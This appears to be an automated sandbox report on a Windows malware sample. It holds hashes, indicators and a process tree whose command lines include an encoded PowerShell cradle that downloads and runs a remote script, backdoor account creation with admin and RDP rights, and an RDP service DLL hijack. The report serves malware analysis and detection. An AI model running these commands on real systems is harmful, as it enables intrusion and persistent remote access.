Analysis
- max time kernel: 37s
- max time network: 105s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 15-11-2020 22:40

Static task: static1
Behavioral task: behavioral1
- Sample: fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
- Resource: win10v20201028
General
- Target: fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
- Size: 3.4MB
- MD5: e8b8bd2c147f0bf4aa3762b32b778351
- SHA1: a022f98fc7f16cb849ea2b6826eedd077db2360b
- SHA256: fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1
- SHA512: 0f0591aa79c39bd01cc7fe9b654e2709975c0eb47dce2abb8ddd2d7b49be8015a94b8f284a5ce94295ed7ebcecf6ded4346702672271b665d8873040938c9a9b

Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blacklisted process makes network request (9 IoCs)
  Processes:
  flow | pid | process
  16 | 648 | powershell.exe
  18 | 648 | powershell.exe
  19 | 648 | powershell.exe
  20 | 648 | powershell.exe
  22 | 648 | powershell.exe
  24 | 648 | powershell.exe
  26 | 648 | powershell.exe
  28 | 648 | powershell.exe
  30 | 648 | powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
  Processes:
  resource | yara_rule
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx
- Deletes itself (1 IoCs)
  Processes:
  pid | process
  4316 | powershell.exe
- Loads dropped DLL (2 IoCs)
  Processes:
  pid | process
  3912 | 3912
- Modifies service (2 TTPs, 2 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | reg.exe
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes:
  description | ioc | process
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE865.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ptyet41g.5ba.ps1 | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1ccurbfw.erz.psm1 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE7A6.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE875.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE7C7.tmp | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE854.tmp | powershell.exe
- Modifies data under HKEY_USERS (217 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = de4ef1e88fadd601 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." | powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (2 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description | flow | ioc
  HTTP User-Agent header | 18 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 20 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes:
  pid | process
  4316 | powershell.exe
  4316 | powershell.exe
  4316 | powershell.exe
  4316 | powershell.exe
  4316 | powershell.exe
  4316 | powershell.exe
  648 | powershell.exe
  648 | powershell.exe
  648 | powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid | process
  620 | 620
- Suspicious use of AdjustPrivilegeToken (77 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 4316 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 4316 | powershell.exe
  Token: SeSecurityPrivilege | 4316 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 4316 | powershell.exe
  Token: SeLoadDriverPrivilege | 4316 | powershell.exe
  Token: SeSystemProfilePrivilege | 4316 | powershell.exe
  Token: SeSystemtimePrivilege | 4316 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 4316 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 4316 | powershell.exe
  Token: SeCreatePagefilePrivilege | 4316 | powershell.exe
  Token: SeBackupPrivilege | 4316 | powershell.exe
  Token: SeRestorePrivilege | 4316 | powershell.exe
  Token: SeShutdownPrivilege | 4316 | powershell.exe
  Token: SeDebugPrivilege | 4316 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 4316 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 4316 | powershell.exe
  Token: SeUndockPrivilege | 4316 | powershell.exe
  Token: SeManageVolumePrivilege | 4316 | powershell.exe
  Token: 33 | 4316 | powershell.exe
  Token: 34 | 4316 | powershell.exe
  Token: 35 | 4316 | powershell.exe
  Token: 36 | 4316 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 4316 | powershell.exe
  Token: SeSecurityPrivilege | 4316 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 4316 | powershell.exe
  Token: SeLoadDriverPrivilege | 4316 | powershell.exe
  Token: SeSystemProfilePrivilege | 4316 | powershell.exe
  Token: SeSystemtimePrivilege | 4316 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 4316 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 4316 | powershell.exe
  Token: SeCreatePagefilePrivilege | 4316 | powershell.exe
  Token: SeBackupPrivilege | 4316 | powershell.exe
  Token: SeRestorePrivilege | 4316 | powershell.exe
  Token: SeShutdownPrivilege | 4316 | powershell.exe
  Token: SeDebugPrivilege | 4316 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 4316 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 4316 | powershell.exe
  Token: SeUndockPrivilege | 4316 | powershell.exe
  Token: SeManageVolumePrivilege | 4316 | powershell.exe
  Token: 33 | 4316 | powershell.exe
  Token: 34 | 4316 | powershell.exe
  Token: 35 | 4316 | powershell.exe
  Token: 36 | 4316 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 4316 | powershell.exe
  Token: SeSecurityPrivilege | 4316 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 4316 | powershell.exe
  Token: SeLoadDriverPrivilege | 4316 | powershell.exe
  Token: SeSystemProfilePrivilege | 4316 | powershell.exe
  Token: SeSystemtimePrivilege | 4316 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 4316 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 4316 | powershell.exe
  Token: SeCreatePagefilePrivilege | 4316 | powershell.exe
  Token: SeBackupPrivilege | 4316 | powershell.exe
  Token: SeRestorePrivilege | 4316 | powershell.exe
  Token: SeShutdownPrivilege | 4316 | powershell.exe
  Token: SeDebugPrivilege | 4316 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 4316 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 4316 | powershell.exe
  Token: SeUndockPrivilege | 4316 | powershell.exe
  Token: SeManageVolumePrivilege | 4316 | powershell.exe
  Token: 33 | 4316 | powershell.exe
  Token: 34 | 4316 | powershell.exe
  Token: 35 | 4316 | powershell.exe
  Token: 36 | 4316 | powershell.exe
- Suspicious use of WriteProcessMemory (68 IoCs)
  Processes (each write is reported twice in the source table; listed once here with x2):
  description | pid | process | target process
  PID 4760 wrote to memory of 4316 | 4760 | fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe | powershell.exe (x2)
  PID 4316 wrote to memory of 508 | 4316 | powershell.exe | csc.exe (x2)
  PID 508 wrote to memory of 908 | 508 | csc.exe | cvtres.exe (x2)
  PID 4316 wrote to memory of 1844 | 4316 | powershell.exe | reg.exe (x2)
  PID 4316 wrote to memory of 2000 | 4316 | powershell.exe | reg.exe (x2)
  PID 4316 wrote to memory of 932 | 4316 | powershell.exe | reg.exe (x2)
  PID 4316 wrote to memory of 2268 | 4316 | powershell.exe | net.exe (x2)
  PID 2268 wrote to memory of 2376 | 2268 | net.exe | net1.exe (x2)
  PID 4316 wrote to memory of 2440 | 4316 | powershell.exe | cmd.exe (x2)
  PID 2440 wrote to memory of 2728 | 2440 | cmd.exe | cmd.exe (x2)
  PID 2728 wrote to memory of 2892 | 2728 | cmd.exe | net.exe (x2)
  PID 2892 wrote to memory of 4372 | 2892 | net.exe | net1.exe (x2)
  PID 4316 wrote to memory of 3332 | 4316 | powershell.exe | cmd.exe (x2)
  PID 3332 wrote to memory of 4464 | 3332 | cmd.exe | cmd.exe (x2)
  PID 4464 wrote to memory of 3036 | 4464 | cmd.exe | net.exe (x2)
  PID 3036 wrote to memory of 3516 | 3036 | net.exe | net1.exe (x2)
  PID 4524 wrote to memory of 4484 | 4524 | cmd.exe | net.exe (x2)
  PID 4484 wrote to memory of 4624 | 4484 | net.exe | net1.exe (x2)
  PID 4580 wrote to memory of 3824 | 4580 | cmd.exe | net.exe (x2)
  PID 3824 wrote to memory of 3984 | 3824 | net.exe | net1.exe (x2)
  PID 4668 wrote to memory of 4748 | 4668 | cmd.exe | net.exe (x2)
  PID 4748 wrote to memory of 4720 | 4748 | net.exe | net1.exe (x2)
  PID 4292 wrote to memory of 4468 | 4292 | cmd.exe | net.exe (x2)
  PID 4468 wrote to memory of 4472 | 4468 | net.exe | net1.exe (x2)
  PID 2032 wrote to memory of 4032 | 2032 | cmd.exe | net.exe (x2)
  PID 4032 wrote to memory of 2328 | 4032 | net.exe | net1.exe (x2)
  PID 2436 wrote to memory of 4700 | 2436 | cmd.exe | net.exe (x2)
  PID 4700 wrote to memory of 2044 | 4700 | net.exe | net1.exe (x2)
  PID 5028 wrote to memory of 3928 | 5028 | cmd.exe | WMIC.exe (x2)
  PID 4220 wrote to memory of 4300 | 4220 | cmd.exe | WMIC.exe (x2)
  PID 552 wrote to memory of 396 | 552 | cmd.exe | cmd.exe (x2)
  PID 396 wrote to memory of 648 | 396 | cmd.exe | powershell.exe (x2)
Processes (nesting shows parent/child depth)
- [depth 1] C:\Users\Admin\AppData\Local\Temp\fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    Signatures: Deletes itself; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B02.tmp" "c:\Users\Admin\AppData\Local\Temp\bsk1nuli\CSC5AFA9353C6024F6DB26019D1805C12.TMP"
    - [depth 3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - [depth 3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies service; Modifies registry key
    - [depth 3] C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - [depth 3] C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - [depth 3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\system32\net.exe
          Command line: net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - [depth 6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
    - [depth 3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Signatures: Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\system32\net.exe
          Command line: net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - [depth 6] C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
    - [depth 3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - [depth 3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin Ghasar4f5 /del
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\system32\net.exe
    Command line: net.exe user updwin Ghasar4f5 /del
    Signatures: Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin Ghasar4f5 /del
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin 6t6RXgqs /add
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\system32\net.exe
    Command line: net.exe user updwin 6t6RXgqs /add
    Signatures: Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin 6t6RXgqs /add
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" updwin /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user updwin 6t6RXgqs
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\system32\net.exe
    Command line: net.exe user updwin 6t6RXgqs
    Signatures: Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user updwin 6t6RXgqs
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
    Signatures: Modifies data under HKEY_USERS
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
- [depth 1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\system32\cmd.exe
